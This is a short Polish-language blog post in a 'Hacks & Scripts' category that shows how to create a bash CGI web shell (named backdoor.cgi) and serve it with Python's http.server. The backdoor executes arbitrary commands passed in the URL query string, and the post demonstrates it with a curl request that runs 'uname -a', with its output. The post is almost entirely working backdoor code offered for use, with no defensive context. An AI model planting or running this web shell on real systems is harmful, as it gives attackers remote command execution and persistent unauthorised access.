Webshell / backdoor CGI za pomocą python http.server
Napisał: Patryk Krawaczyński
16/11/2020 w Hacks & Scripts Brak komentarzy. (artykuł nr 758, ilość słów: 63)
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'spc=" "' >> ./cgi-bin/backdoor.cgi
echo 'str=$1' >> ./cgi-bin/backdoor.cgi
echo 'cmd=$(echo "${str//XXX/$spc}")' >> ./cgi-bin/backdoor.cgi
echo 'printf '"'"'%s\n'"'"' "$($cmd)"' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi
curl "http://localhost:8000/cgi-bin/backdoor.cgi?unameXXX-a"
Darwin johhny5 19.6.0 Darwin Kernel Version 19.6.0: Thu Oct 29 22:56:45 PDT 2020; root:xnu-6153.141.2.2~1/RELEASE_X86_64 x86_64
Więcej informacji: Mark Baggett github gist
K a t e g o r i e : Hacks & Scripts
T a g i : backdoor, bash, cgi, command line, python, remote code execution
